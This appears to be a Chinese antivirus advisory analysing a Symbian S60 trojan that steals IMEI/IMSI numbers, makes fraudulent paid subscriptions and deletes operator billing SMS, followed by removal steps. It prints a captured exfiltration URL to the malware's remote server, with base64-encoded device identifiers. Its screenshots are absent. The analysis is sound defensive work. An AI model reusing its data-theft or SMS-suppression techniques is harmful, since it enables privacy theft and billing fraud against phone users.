S.Payment.NetService.b

影响系统:Symbian S60 (3^rd、5^th)

病毒描述:

    该病毒安装成功后自动运行于后台。病毒在运行过程中获取用户IMEI、IMSI号码，并联网上传到远端服务器。病毒在运行过程中访问远程服务器中获取订购任务网址，并访问网址进行恶意订购。病毒在运行过程中屏蔽10086发送的回执短信。病毒会常驻手机内存，消耗用户手机CPU资源。

病毒危害:

1. 病毒在运行过程中获取用户IMEI、IMSI号码，并联网上传到远端服务器，窃取用户隐私。
2. 病毒在运行过程中访问远程服务器中获取订购任务网址，并访问网址进行恶意订购。具有恶意扣费行为。
3. 病毒在运行过程中屏蔽10086发送的回执短信,造成系统破坏，同时使用户无法及时收到扣费通知，给用户带来一定的经济损失。
4. 病毒会常驻手机内存，消耗用户手机CPU资源。具有流氓行为。

病毒运行原理：

1. 病毒安装成功后无桌面图标生成，在程序管理界面可发现病毒已经成功安装：

          

           在任务管理器中生成进程"NetService.exe"。

 

     2.  病毒在运行过程中获取用户IMEI、IMSI号码，并联网上传到远端服务器，窃取用户隐私。

         (http://s.moononsun.com/login.aspx?  userurl=dXNlcmlkPTAmcGFydG5lcmlkPTAmcHJvY29kZT0yMDAxMTUmdmVyc2lvbj01LjA1Jm9zPXM2MHYzJ

nBob25lPSZpbWVpPTM1OTMyNzAzNTM1NzMwNCZpbXNpPSZ1YT1Ob2tpYUU1Mi0xJlRlbFlFPTEwMCZzbXNjPSs4NjEzODAwMjUwNTAw)

         获取用户手机IMEI号码：

  

         

         获取用户手机IMSI号码:

        

        

         数据经过base64编码：

        

        

         隐私上传地址:

        

      3. 病毒在运行过程中访问远程服务器中获取订购任务网址。具有恶意扣费行为。

       访问服务器显示：

       

        4. 病毒在运行过程中屏蔽10086发送的回执短信,造成系统破坏，同时使用户无法及时收到扣费通知，给用户带来一定的经济损失。

        设置拦截短信：

        

         获取短信号码：

         

         拦截用户手机短信：

           

        屏蔽短信号码：

       

        删除短信：

        

       5. 病毒安装成功后在后头生成进程"NetService.exe"并常驻手机内存，消耗用户手机CPU资源。

        

       解决方案：

       打开手机设置选项，依次选择【安装】—【程序管理】，在其中找到” NetService.exe”，依次点击【强制停止】—【删除】，然后点击【清除数据】确保软件被清除干净，同时去手机路径c:\sys\bin目录下，删除相关程序。